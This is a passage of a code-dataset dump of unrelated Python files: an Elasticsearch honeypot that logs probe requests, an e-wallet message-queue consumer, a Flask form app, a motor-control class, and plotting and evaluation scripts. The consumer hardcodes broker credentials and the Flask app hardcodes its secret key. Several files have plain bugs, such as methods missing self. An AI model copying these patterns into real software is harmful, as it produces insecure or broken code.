logger.info(\"Found possible attack (/_cat/indices): \" + request.url)\n\n with open(os.path.join(template_folder, 'getindeces.txt')) as fp:\n return fp.read()\n\n\n# handle search route (GET)\n@route('/_search', method='GET')\ndef handleSearchExploitGet():\n logger.info(\"Found possible attack (_search): \" + request.url)\n return \"\"\n\n\n# handle search route (POST)\n@route('/_search', method='POST')\ndef handleSearchExploit():\n logger.info(\"Found possible attack (_search): \" + request.url)\n return \"\"\n\n\n# handle head plugin\n@route('/_plugin/head')\ndef pluginhead():\n logger.info(\"Access to ElasticSearch head plugin: \" + request.url)\n\n response.content_type = 'text/html'\n\n with open(os.path.join(template_folder, 'pluginhead.txt')) as fp:\n return fp.read()\n","sub_path":"elasticpot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399132934","text":"#!/usr/bin/env python\nimport time\nimport json\nimport pika\nimport threading\nfrom datetime import datetime\n\nfrom publisher import EWalletPublisher\nfrom tinydb import TinyDB, Query\n\nFULL_QUORUM = 8\nHALF_QUORUM = 5\nNO_QUORUM = 0\n\nclass EWalletConsumer():\n def __init__(self, queue_url, npm, publisher):\n self.queue_url = queue_url\n self.credentials = pika.PlainCredentials('sisdis', 'sisdis')\n self.npm = npm\n\n self.ex_ping = 'EX_PING'\n self.ex_register = 'EX_REGISTER'\n self.ex_saldo = 'EX_GET_SALDO'\n self.ex_transfer = 'EX_TRANSFER'\n self.ex_total_saldo = 'EX_GET_TOTAL_SALDO'\n self.publisher = publisher\n\n self.db = TinyDB('db.json')\n self.DB = Query()\n\n self.transfer_user_id = None\n self.transfer_nilai = None\n\n def _get_neighbors(self):\n return [\n '1306398983', # irfan\n '1406579100',\n '1406527620',\n '1406572025',\n '1406543712',\n '1406543826',\n '1406543845', # gilang\n '1406543574', # oda\n # '1406559055', # ghozi\n # '1406572025', # adit\n # '1406543883', # jefly\n # '1406559036', # gales\n ]\n\n def _get_active_neighbors(self):\n print('Checking QUORUM')\n neighbors = self._get_neighbors()\n active = []\n\n for neighbor in neighbors:\n try:\n result = self.db.get((self.DB.user_id == neighbor) & (self.DB.ts.exists()))\n\n if result is not None:\n ts_now = datetime.now()\n ts_neighbor_str = result['ts']\n ts_neighbor = datetime.strptime(ts_neighbor_str, '%Y-%m-%d %H:%M:%S')\n\n ts_diff = (ts_now - ts_neighbor).seconds\n print('PING Time diff {}: {} seconds'.format(neighbor, ts_diff))\n if ts_diff <= 10:\n active.append(neighbor)\n else:\n print('PING Not found {}'.format(neighbor))\n except Exception as e:\n print('Error retrieving from db: {}'.format(e.message))\n\n return active\n\n def _quorum_check(self):\n quorum = len(self._get_active_neighbors())\n print('QUORUM={}'.format(quorum))\n\n return quorum\n\n def _has_registered(self, user_id):\n result = self.db.get((self.DB.user_id == user_id) & (self.DB.nilai_saldo.exists()))\n if result is not None:\n print(\"{} has registered\".format(user_id))\n return True\n return False\n\n def _retrieve_saldo(self, user_id):\n result = self.db.get((self.DB.user_id == user_id) & (self.DB.nilai_saldo.exists()))\n if result is not None:\n value = int(result['nilai_saldo'])\n print(\"Retrieving saldo of {}, value {}\".format(user_id, value))\n return value\n return -1\n\n def _update_saldo(self, user_id, nilai):\n result = self.db.get((self.DB.user_id == user_id) & (self.DB.nilai_saldo.exists()))\n if result is not None:\n initial_value = result['nilai_saldo']\n final_value = int(initial_value) + int(nilai)\n self.db.update({\n 'nilai_saldo': final_value\n }, self.DB.user_id == user_id)\n\n print('Updating {}\\'s saldo from {} to {}', user_id, initial_value, final_value)\n return 1\n print('Failed updating saldo. User id {} not found.'.format(user_id))\n return -4\n\n # message = dict\n def _update_db(self, message):\n result = self.db.get(self.DB.user_id == message['user_id'])\n\n if result is not None:\n self.db.update({\n 'ts': message['ts']\n }, self.DB.user_id == message['user_id'])\n print(\"DB updated: {}\".format(message))\n else:\n self.db.insert(message)\n print(\"DB inserted: {}\".format(message))\n\n def _ping_callback(self, ch, method, properties, body):\n print(\"PING received: {}\".format(body))\n body = json.loads(body)\n\n message = {\n 'user_id': body['npm'],\n 'ts': body['ts']\n }\n\n self._update_db(message)\n\n def _register_response_callback(self, ch, method, properties, body):\n print('Received REGISTER RESPONSE: {}'.format(body))\n ch.connection.close()\n\n def _register_request_callback(self, ch, method, properties, body):\n print('Received REGISTER REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n\n try:\n message = {\n 'user_id': body['user_id'],\n 'nama': body['nama'],\n 'nilai_saldo': 0\n }\n\n if self._quorum_check() >= HALF_QUORUM:\n if not self._has_registered(body['user_id']):\n self._update_db(message)\n status_register = 1\n else:\n status_register = -4\n else:\n status_register = -2\n except:\n status_register = -99\n\n self.publisher.publish_register_response(status_register=status_register, sender_id=sender_id)\n\n def _saldo_response_callback(self, ch, method, properties, body):\n print('Received GET SALDO RESPONSE: {}'.format(body))\n ch.connection.close()\n\n def _saldo_request_callback(self, ch, method, properties, body):\n print('Received GET SALDO REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n\n try:\n if self._quorum_check() >= HALF_QUORUM:\n nilai_saldo = self._retrieve_saldo(body['user_id'])\n else:\n nilai_saldo = -2\n except:\n nilai_saldo = -99\n\n self.publisher.publish_saldo_response(nilai_saldo=nilai_saldo, sender_id=sender_id)\n\n def _transfer_response_callback(self, ch, method, properties, body):\n print('Received TRANSFER RESPONSE: {}'.format(body))\n\n body = json.loads(body)\n action = body['action']\n status_transfer = int(body['status_transfer'])\n\n if action == 'transfer':\n if status_transfer == 1:\n if self.transfer_user_id and self.transfer_nilai:\n # subtract current saldo\n self._update_saldo(user_id=self.transfer_user_id,\n nilai=-self.transfer_nilai)\n\n ch.connection.close()\n self.transfer_user_id = None\n self.transfer_nilai = None\n\n def _transfer_request_callback(self, ch, method, properties, body):\n print('Received TRANSFER REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n\n try:\n if self._quorum_check() >= HALF_QUORUM:\n status_transfer = self._update_saldo(body['user_id'], body['nilai'])\n else:\n status_transfer = -2\n except:\n status_transfer = -99\n\n self.publisher.publish_transfer_response(status_transfer=status_transfer, sender_id=sender_id)\n\n def _total_saldo_response_callback(self, ch, method, properties, body):\n print('Received GET TOTAL SALDO RESPONSE: {}'.format(body))\n ch.connection.close()\n\n def _total_saldo_request_callback(self, ch, method, properties, body):\n print('Received GET TOTAL SALDO REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n user_id = body['user_id']\n try:\n active_neighbors = self._get_active_neighbors()\n neighbor_count = len(active_neighbors)\n\n if neighbor_count >= HALF_QUORUM:\n\n consumer = TotalSaldoConsumer(queue_url=self.queue_url,\n npm=self.npm,\n publisher=self.publisher,\n neighbor_count=neighbor_count)\n\n consume_thread = threading.Thread(\n target=consumer.consume_saldo_response_total\n )\n consume_thread.start()\n time.sleep(0.5)\n\n for neighbor in active_neighbors:\n print('Sending GET SALDO REQUEST to: {}'.format(neighbor))\n self.publisher.publish_saldo_request(user_id, neighbor)\n else:\n nilai_saldo = -2\n self.publisher.publish_total_saldo_response(nilai_saldo=nilai_saldo,\n sender_id=sender_id)\n except:\n nilai_saldo = -99\n self.publisher.publish_total_saldo_response(nilai_saldo=nilai_saldo,\n sender_id=sender_id)\n\n def consume_ping(self):\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.queue_url,\n credentials=self.credentials))\n channel = connection.channel()\n\n channel.exchange_declare(exchange=self.ex_ping,\n exchange_type='fanout')\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.ex_ping,\n queue=queue_name)\n channel.basic_consume(self._ping_callback,\n queue=queue_name,\n no_ack=True)\n channel.start_consuming()\n\n def _consume_direct(self, routing_key, exchange_name, callback):\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.queue_url,\n credentials=self.credentials))\n channel = connection.channel()\n\n channel.exchange_declare(exchange=exchange_name,\n exchange_type='direct',\n durable=True)\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=exchange_name,\n queue=queue_name,\n routing_key=routing_key)\n channel.basic_consume(consumer_callback=callback,\n queue=queue_name,\n no_ack=True)\n channel.start_consuming()\n\n def consume_register_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_register, self._register_response_callback)\n\n def consume_register_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_register, self._register_request_callback)\n\n def consume_saldo_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_saldo, self._saldo_response_callback)\n\n def consume_saldo_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_saldo, self._saldo_request_callback)\n\n def consume_transfer_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_transfer, self._transfer_request_callback)\n\n def consume_transfer_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_transfer, self._transfer_response_callback)\n\n def consume_total_saldo_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_total_saldo, self._total_saldo_request_callback)\n\n def consume_total_saldo_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_total_saldo, self._total_saldo_response_callback)\n\n\nclass TotalSaldoConsumer():\n def __init__(self, queue_url, npm, publisher, neighbor_count):\n self.queue_url = queue_url\n self.credentials = pika.PlainCredentials('sisdis', 'sisdis')\n self.npm = npm\n self.ex_saldo = 'EX_GET_SALDO'\n self.publisher = publisher\n\n self.neighbor_count = neighbor_count\n\n self.total_saldo = 0\n\n def _saldo_total_response_callback(self, ch, method, properties, body):\n print('Received GET SALDO RESPONSE (TOTAL): {}'.format(body))\n\n body = json.loads(body)\n nilai_saldo = int(body['nilai_saldo'])\n\n self.neighbor_count -= 1\n print('USER_COUNT={}'.format(self.neighbor_count))\n\n if nilai_saldo not in [-1, -2, -4, -99]:\n self.total_saldo += nilai_saldo\n\n if self.neighbor_count <= 0:\n print('Closing connection')\n ch.connection.close()\n print ('Publishing result response')\n self.publisher.publish_total_saldo_response(nilai_saldo=self.total_saldo,\n sender_id=self.npm)\n\n def consume_saldo_response_total(self):\n print('Consuming saldo response total')\n routing_key = 'RESP_{}'.format(self.npm)\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.queue_url,\n credentials=self.credentials))\n channel = connection.channel()\n\n channel.exchange_declare(exchange=self.ex_saldo,\n exchange_type='direct',\n durable=True)\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.ex_saldo,\n queue=queue_name,\n routing_key=routing_key)\n channel.basic_consume(consumer_callback=self._saldo_total_response_callback,\n queue=queue_name,\n no_ack=True)\n print('Starting consumption saldo response total')\n\n channel.start_consuming()\n\n print('Finish consuming saldo response total')\n channel.connection.close()\n","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":14254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"262913030","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 22 22:24:39 2019\n\n@author: Martin\n\"\"\"\n\n\n# Classe solveur pour le jeu ricochets robot\n\n# Utilisation du type deque pour piles et files.\n\nfrom collections import deque\nimport game as g\n\n\nclass RRSolveur :\n \n def __init__(game_controler , state_encoder) :\n self.gc = game_controler\n \n self.actions = game_controler.actions()\n node_0 = state_encoder.encode(game_controler.initial_state()) \n \n \n \n \n def Solve(game) :\n \"\"\" game est un objet de classe Game \"\"\"\n \n # Listes des actions possibles \n \n \n actions = deque([]) # pile des actions\n \n initial_state = game.state()\n states = { initial_state : None} # dictionnaire des états \n \n node_queue = deque ([initial_state])\n \n \n \n \n \n \n ","sub_path":"rrsolveur.py","file_name":"rrsolveur.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"151353625","text":"from flask import Flask, render_template, redirect, url_for, request, flash\r\nimport INSERT_Values_DB\r\n\r\napp = Flask(__name__)\r\napp.secret_key = b'_vasu2L\"F4Q8z\\n\\xec]/'\r\n\r\n\r\n@app.route('/')\r\ndef render_static():\r\n return render_template('Personal_Details.html')\r\n\r\n\r\n@app.route('/insert', methods=['POST'])\r\ndef insert():\r\n if request.method == 'POST':\r\n ######\r\n eid = request.form['EID']\r\n gender = request.form['gender']\r\n BloodGrp = request.form[\"bldgrp\"]\r\n Addr_Line_1 = request.form['Addr_Line_1']\r\n Addr_Line_2 = request.form['Addr_Line_2']\r\n City = request.form['City']\r\n State = request.form['State']\r\n PIN = request.form['PIN']\r\n x = INSERT_Values_DB.dup_check(eid) #calling duplicate values cheacking function.\r\n print(x)\r\n if(x!=None):\r\n flash(\"Eployee ID Alerady exist\", \"error\")\r\n return render_template('Personal_Details.html')\r\n\r\n else:\r\n INSERT_Values_DB.insertValues(eid, gender, BloodGrp, Addr_Line_1, Addr_Line_2, City, State, PIN)\r\n flash(\"Data store Successefully \", \"error\")\r\n return render_template('Personal_Details.html')\r\n ######\r\n return render_template('Personal_Details.html')\r\n else:\r\n return \"Nothing\"\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"Personal Deatils HTMl/UI_Flask.py","file_name":"UI_Flask.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"491682408","text":"#from smbus2 import SMBus\nimport smbus\nimport time\nimport os\nimport subprocess\nimport spidev\n\nclass motorTest:\n channel = 1\n bus = smbus.SMBus(channel)\n address = 0\n target_register = 0\n completion_register = 0\n maxSpeed = 5\n \n def __init__(self, addressIn, targetIn, compIn):\n #setup I2C on rasPi\n self.address = addressIn\n self.target_register = targetIn\n self.completion_register = compIn\n\n def forwardMarch(self, speed, distance):\n ###\n # speed - negative max to positive max\n # distance 1 to 256 feet\n ###\n binCmd = format(0, '0>2b')\n binDir = (format(0, '0>1b'), format(1, \"b\"))[speed > 0]\n binSpeed = format(round(abs(speed/maxSpeed*32-1)), '0>5b')\n binDist = format(distance, '0>8b')\n \n byte1 = binCmd + binDir + binSpeed\n byte2 = binDist\n \n msg = [byte1, byte2]\n bus.write_i2c_block_data(address, target_register, msg)\n\n def arcRun(self, speed, distance, radius):\n ###\n # speed - negative max to positive max\n # distance - 0 to 180 degrees\n # radius - 1 to 15 feet\n ###\n binCmd = format(0, '0>2b')\n binDir = (format(0, '0>1b'), format(1, \"b\"))[speed > 0]\n binSpeed = format(round(abs(speed/maxSpeed*32-1)), '0>5b')\n binDist = format(round(distance/180*16-1, '0>4b'))\n binRadius = format(radius, '0>4b')\n \n byte1 = binCmd + binDir + binSpeed\n byte2 = binDist + binRadius\n \n msg = [byte1, byte2]\n bus.write_i2c_block_data(address, target_register, msg)\n \n def turnInPlace(self, speed, angle):\n ###\n # speed - negative max to positive max\n # angle - 0 to 360\n ###\n binCmd = format(0, '0>2b')\n binDir = (format(0, '0>1b'), format(1, \"b\"))[speed > 0]\n binSpeed = format(round(abs(speed/maxSpeed*32-1)), '0>5b')\n binAngle = format(round(angle/360*255-1, '0>4b'))\n \n byte1 = binCmd + binDir + binSpeed\n byte2 = binAngle\n \n msg = [byte1, byte2]\n bus.write_i2c_block_data(address, target_register, msg)\n \n def commandComplete(self):\n if(read_byte_data(self.address, completion_register)):\n return True\n else:\n return False\n \n\n#setup the samd with SW, openocd\n\n\n\n","sub_path":"motor_control_API/motorTest.py","file_name":"motorTest.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183607353","text":"import numpy as np\n\nfrom openmdao.api import ExplicitComponent\n\n\n# Dynamics---original, 2nd order:\n# x''=0\n# y''=-g\n# Dynamics---modified, 1st order:\n# (x )' = x'\n# (y )' = y'\n# (x')' = 0\n# (y')' = -g\n# Initial conditions:\n# (x )_0 = 0\n# (y )_0 = 0\n# (x')_0 = v * cos(theta)\n# (y')_0 = v * sin(theta)\n# Constraints:\n# (y )_f = 0 \n# Objective:\n# (x )_f [maximize!]\n\nclass ProjectileSystem(ExplicitComponent):\n\n def initialize(self):\n self.options.declare('num_nodes', default=1, types=int)\n\n self.g = -9.81\n\n def setup(self):\n num = self.options['num_nodes']\n\n self.add_input('vx', shape=(num, 1))\n self.add_input('vy', shape=(num, 1))\n\n self.add_output('dx_dt', shape=(num, 1))\n self.add_output('dy_dt', shape=(num, 1))\n self.add_output('dvx_dt', shape=(num, 1))\n self.add_output('dvy_dt', shape=(num, 1))\n\n self.declare_partials('*', '*', dependent=False)\n\n self.declare_partials('dx_dt', 'vx', val=1., rows=np.arange(num), cols=np.arange(num))\n self.declare_partials('dy_dt', 'vy', val=1., rows=np.arange(num), cols=np.arange(num))\n\n def compute(self, inputs, outputs):\n outputs['dx_dt'] = inputs['vx']\n outputs['dy_dt'] = inputs['vy']\n outputs['dvx_dt'] = 0.\n outputs['dvy_dt'] = self.g\n","sub_path":"Openmdao/example/Ozone/projectile_system.py","file_name":"projectile_system.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44989416","text":"#coding=utf-8\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import jaccard_similarity_score\nfrom sklearn.metrics import f1_score\n\nimport numpy as np\nimport tensorflow as tf\nfrom model.SegCaps import SegCaps\nimport config as cfg\nimport time\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\n########################## 要改的东西 #######################################\nnum_epochs = cfg.num_epochs\nis_train=True #True使用训练集,#False使用测试集\ntest_data_number = 10\nbatch_size = cfg.batch_size\nsave_list_csv = cfg.save_list_csv\nsave_mean_csv = cfg.save_mean_csv\n########################## end ##########################################\n\nfrom v1.use_seg_tfrecord import create_inputs_seg_hand\n\n\n\ndef plot_roc_curve(y_true,y_scores):\n fpr, tpr, thresholds = roc_curve((y_true), y_scores)\n AUC_ROC = roc_auc_score(y_true, y_scores)\n print(\"Area under the ROC curve: \" + str(AUC_ROC))\n roc_curve_figure = plt.figure()\n plt.plot(fpr, tpr, '-', label='Area Under the Curve (AUC = %0.4f)' % AUC_ROC)\n plt.title('ROC curve')\n plt.xlabel(\"FPR (False Positive Rate)\")\n plt.ylabel(\"TPR (True Positive Rate)\")\n plt.legend(loc=\"lower right\")\n plt.savefig(\"ROC.png\")\n plt.cla()\n plt.close(\"all\")\n return AUC_ROC\n\ndef plot_precision_recall_curve(y_true, y_scores):\n # Precision-recall curve\n precision, recall, thresholds = precision_recall_curve(y_true, y_scores)\n precision = np.fliplr([precision])[0] # so the array is increasing (you won't get negative AUC)\n recall = np.fliplr([recall])[0] # so the array is increasing (you won't get negative AUC)\n AUC_prec_rec = np.trapz(precision, recall)\n print(\"Area under Precision-Recall curve: \" + str(AUC_prec_rec))\n prec_rec_curve = plt.figure()\n plt.plot(recall, precision, '-', label='Area Under the Curve (AUC = %0.4f)' % AUC_prec_rec)\n plt.title('Precision - Recall curve')\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.legend(loc=\"lower right\")\n plt.savefig(\"Precision_recall.png\")\n plt.cla()\n plt.close(\"all\")\n return AUC_prec_rec\n\n\ndef convert_to_binary(shape,y_scores):\n threshold_confusion = 0.5\n print(\"Confusion matrix: Custom threshold (for positive) of \" + str(threshold_confusion))\n y_pred = np.empty((shape))\n for i in range(shape):\n if y_scores[i] >= threshold_confusion:\n y_pred[i] = 1\n else:\n y_pred[i] = 0\n return y_pred\n\ndef plot_confusion_matrix(y_true, y_pred):\n # Confusion matrix\n confusion = confusion_matrix(y_true, y_pred)\n print(confusion)\n accuracy = 0\n if float(np.sum(confusion)) != 0:\n accuracy = float(confusion[0, 0] + confusion[1, 1]) / float(np.sum(confusion))\n print(\"Global Accuracy: \" + str(accuracy))\n specificity = 0\n if float(confusion[0, 0] + confusion[0, 1]) != 0:\n specificity = float(confusion[0, 0]) / float(confusion[0, 0] + confusion[0, 1])\n print(\"Specificity: \" + str(specificity))\n sensitivity = 0\n if float(confusion[1, 1] + confusion[1, 0]) != 0:\n sensitivity = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[1, 0])\n print(\"Sensitivity: \" + str(sensitivity))\n precision = 0\n if float(confusion[1, 1] + confusion[0, 1]) != 0:\n precision = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[0, 1])\n print(\"Precision: \" + str(precision))\n return accuracy, specificity, sensitivity, precision\n\ndef get_F1_score(y_true, y_pred):\n # F1 score\n F1_score = f1_score(y_true, y_pred, labels=None, average='binary', sample_weight=None)\n print(\"F1 score (F-measure): \" + str(F1_score))\n return F1_score\n\n\n\n\ndef get_jaccard_index(y_true, y_pred):\n # Jaccard similarity index\n jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True)\n print(\"Jaccard similarity score: \" + str(jaccard_index))\n return jaccard_index\n\ndef save_all_pics_value(name_list,all_list):\n\n data = {}\n # 1、保存所有图片的评估值\n for name, value in zip(name_list, all_list):\n data.update({name: value})\n print(data)\n result = pd.DataFrame(data=data)\n result.to_csv(save_list_csv, encoding='gbk')\n print('save to {}'.format(save_list_csv))\n\ndef save_mean_value(name_list,all_list):\n\n AUC_ROC_mean = np.mean(all_list[0])\n AUC_prec_rec_mean = np.mean(all_list[1])\n accuracy_mean = np.mean(all_list[2])\n specificity_mean = np.mean(all_list[3])\n sensitivity_mean = np.mean(all_list[4])\n precision_mean = np.mean(all_list[5])\n jaccard_index_mean = np.mean(all_list[6])\n F1_score_mean = np.mean(all_list[7])\n\n mean_list = [AUC_ROC_mean, AUC_prec_rec_mean, accuracy_mean, specificity_mean,\n sensitivity_mean, precision_mean, jaccard_index_mean, F1_score_mean]\n data = {}\n index = 1 # 只有一行 (为何不加这个index就会报错)\n for name, mean in zip(name_list, mean_list):\n data.update({name: mean})\n mean_result = pd.DataFrame(data, index=[index])\n mean_result.to_csv(save_mean_csv, encoding='gbk')\n print('save to {}'.format(save_mean_csv))\n\ndef start_eval():\n images, labels = create_inputs_seg_hand(is_train=is_train)\n\n session_config = tf.ConfigProto(\n device_count={'GPU': 0},\n gpu_options={'allow_growth': 1,\n # 'per_process_gpu_memory_fraction': 0.1,\n 'visible_device_list': '0'},\n allow_soft_placement=True) ##这个设置必须有,否则无论如何都会报cudnn不匹配的错误,BUG十分隐蔽,真是智障\n with tf.Session(config=session_config) as sess:\n # 1、先定义model才能执行第二步的初始化\n model = SegCaps(sess, cfg, is_train=is_train)\n\n # 2、初始化和启动线程\n tf.global_variables_initializer().run()\n tf.local_variables_initializer().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n model.restore()\n\n\n #列表初始化\n AUC_ROC_list,AUC_prec_rec_list,accuracy_list,specificity_list,sensitivity_list,\\\n precision_list,jaccard_index_list,F1_score_list,all_list,mean_list\\\n =[],[],[],[],[],[],[],[],[],[]\n #3、测试图片\n index = 0\n for i in range(test_data_number//batch_size):\n pics,pics_masks = sess.run([images,labels]) # 取出一个batchsize的图片\n # 3、计算耗时\n since = time.time()\n pre= model.predict(pics)\n seconds = time.time() - since\n\n pre_list = np.split(pre,batch_size,axis=0)\n pres = np.squeeze(pre_list,axis=0)\n\n for label, pre in zip( pics_masks, pres):\n y_scores = pre.reshape(-1, 1)\n y_true = label.reshape(-1, 1)\n\n # 1、画ROC曲线\n AUC_ROC = plot_roc_curve(y_true,y_scores)\n AUC_ROC_list.append(AUC_ROC)\n\n #2、画P_R-curve曲线\n AUC_prec_rec = plot_precision_recall_curve(y_true,y_scores)\n AUC_prec_rec_list.append(AUC_prec_rec)\n\n #3、Confusion matrix\n y_pred_binary = convert_to_binary(shape = y_scores.shape[0], y_scores = y_scores)\n accuracy, specificity, sensitivity, precision \\\n = plot_confusion_matrix(y_true, y_pred_binary)\n\n accuracy_list.append(accuracy)\n specificity_list.append(specificity)\n sensitivity_list.append(sensitivity)\n precision_list.append(precision)\n\n #4、Jaccard similarity index\n jaccard_index = get_jaccard_index(y_true, y_pred_binary)\n jaccard_index_list.append(jaccard_index)\n\n #5、F1 score\n F1_score = get_F1_score(y_true, y_pred_binary)\n F1_score_list.append(F1_score)\n\n print('######################### end ####################################')\n\n\n #1、评估数据存进列表中\n all_list = [AUC_ROC_list, AUC_prec_rec_list, accuracy_list, specificity_list \\\n , sensitivity_list, precision_list, jaccard_index_list, F1_score_list]\n name_list = ['AUC_ROC', 'AUC_prec_rec', 'accuracy', 'specificity',\n 'sensitivity', 'precision', 'jaccard_index', 'F1_score']\n\n # 2、panda保存所有图片的评估值到CSV文件\n save_all_pics_value(name_list, all_list)\n\n #3、panda保存平均值到CSV文件\n save_mean_value(name_list, all_list)\n\n #4、结束\n coord.request_stop()\n coord.join(threads)\n\n\n\nstart_eval()","sub_path":"my_seg_tf/v1/evaluate_by_sklearn.py","file_name":"evaluate_by_sklearn.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560902947","text":"'''\nCreated on Mar 9, 2016\n\n@author: bloyd\n'''\n\nfrom gi.repository import Gtk\n\nclass MainWindow(Gtk.Window):\n \n def __init__(self):\n Gtk.Window.__init__(self, title = \"STACK S.\")\n self.set_border_width(10)\n \n box = Gtk.Box(orientation = Gtk.Orientation.VERTICAL, spacing = 10)\n self.add(box)\n \n # Stack\n main_area = Gtk.Stack()\n main_area.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT_RIGHT)\n main_area.set_transition_duration(2000)\n \n # Checkbox\n check_button = Gtk.CheckButton(\"Does it really work? Is it that close?\")\n main_area.add_titled(check_button, \"CHECKY\", \"So AWESOME\")\n \n # Label\n label = Gtk.Label()\n label.set_markup(\"THE HUGE ONE\")\n main_area.add_titled(label, \"label-name\", \"Big Label\")\n \n # StackSwitcher\n \n stack_switcher = Gtk.StackSwitcher()\n stack_switcher.set_stack(main_area)\n \n box.pack_start(stack_switcher, True, True, 0)\n box.pack_start(main_area, True, True, 0)\n \n \n \n \n \n\n\nwindow = MainWindow()\nwindow.connect(\"delete-event\", Gtk.main_quit)\nwindow.show_all()\nGtk.main()\n","sub_path":"BuckysGTKTutorials/stack_switcher.py","file_name":"stack_switcher.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"222745710","text":"# TOSHIBA - TSDV\n# Team: PHOcr\n# Author: Phung Dinh Tai\n# Email: tai.phungdinh@toshiba-tsdv.com\n# Date create: 03/07/2018\n# Updated by: Phung Dinh Tai\n# Description: Define base class for a reporter\nimport xlsxwriter\nfrom abc import ABCMeta, abstractmethod\nfrom report.lib_base.reporter import Reporter\nfrom report.lib_base.cell_format import COLH\nfrom report.lib_base.cell_format import Color, Align\n\n\nclass XlsxReporter(Reporter):\n\n __metaclass__ = ABCMeta\n\n def __init__(self, **kwargs):\n super(XlsxReporter, self).__init__(**kwargs)\n # Create work book\n self.book = None\n self.line_mapping = {}\n self.column_mapping = {}\n\n def do_work(self):\n # Collect data\n self.collect_data()\n\n # Initial workbook\n self.book = xlsxwriter.Workbook(self.output_file)\n\n # Add sheets\n self.add_sheets()\n\n # Close work book\n self.book.close()\n\n @abstractmethod\n def add_sheets(self):\n pass\n\n # Calculate accuracy\n @staticmethod\n def calculate_accuracy(error, total):\n if total == 0:\n return 0\n return (float(total) - float(error)) * 100 / float(total)\n\n @staticmethod\n def write_cell(sheet, line, column, value, cell_format):\n \"\"\"\n Write data to a cell of the work sheet\n\n Parameters\n ----------\n sheet: WorkSheet\n Sheet to write data\n line: int\n Index of line to write data\n column: int\n Index of column to write data\n value: str/int/float\n Data value to write to cell\n cell_format: Format\n Format of writing cell\n\n Returns\n -------\n None\n\n \"\"\"\n sheet.write(line, column, value, cell_format)\n\n def write_line(self, sheet, line, value_array, cell_format, start_position=0, start_value=0,\n num_elements=None):\n \"\"\"\n Write a line to excel sheet where all cells use the same format\n\n Parameters\n ----------\n sheet: WorkSheet\n Sheet to write data\n line: int\n Line number to write data\n value_array: list\n List of cell data to write to line\n cell_format: Format\n Format for all cells on the line\n start_position: int\n Index of the cell to start writing\n start_value: int\n Index of cell to start writing in input list cells\n num_elements: int\n Number of elements to write when start_value is defined\n\n Returns\n -------\n None\n\n \"\"\"\n if not num_elements:\n num_elements = len(value_array) - start_value\n\n for i in range(0, num_elements):\n self.write_cell(sheet=sheet, line=line, column=start_position + i,\n value=value_array[start_value + i], cell_format=cell_format)\n\n def write_line_multi_format(self, sheet, line, values, formats, start_position=0):\n if len(values) != len(formats):\n raise Exception(\"Wrong formats line {0}\".format(\",\".join(values)))\n for i in range(0, len(values)):\n self.write_cell(sheet=sheet, line=line, column=start_position + i, value=values[i],\n cell_format=formats[i])\n\n def get_cell_format(self, align=\"left\", font=\"Arial\", font_size=10, font_color=None,\n wrap_text=False, set_border=False, num_format=None, bg_color=None,\n set_bold=False):\n fm = self.book.add_format()\n fm.set_align(alignment=align)\n fm.set_font(font_name=font)\n fm.set_font_size(font_size=font_size)\n if wrap_text:\n fm.set_text_wrap()\n if set_border:\n fm.set_border()\n if set_bold:\n fm.set_bold()\n if 